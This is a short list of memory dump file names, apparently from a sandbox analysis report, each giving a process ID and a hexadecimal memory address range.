memory/2148-249-0x00007FF944F30000-0x00007FF944F3D000-memory.dmp

memory/2148-250-0x00007FF934A90000-0x00007FF934B66000-memory.dmp

memory/2148-251-0x00007FF944F00000-0x00007FF944F10000-memory.dmp

memory/2148-252-0x00007FF944090000-0x00007FF9440D7000-memory.dmp

memory/2148-253-0x00007FF9348D0000-0x00007FF9349E2000-memory.dmp

memory/3128-305-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/3712-308-0x0000000074E20000-0x00000000755D0000-memory.dmp

memory/3712-309-0x00000000058B0000-0x00000000058C0000-memory.dmp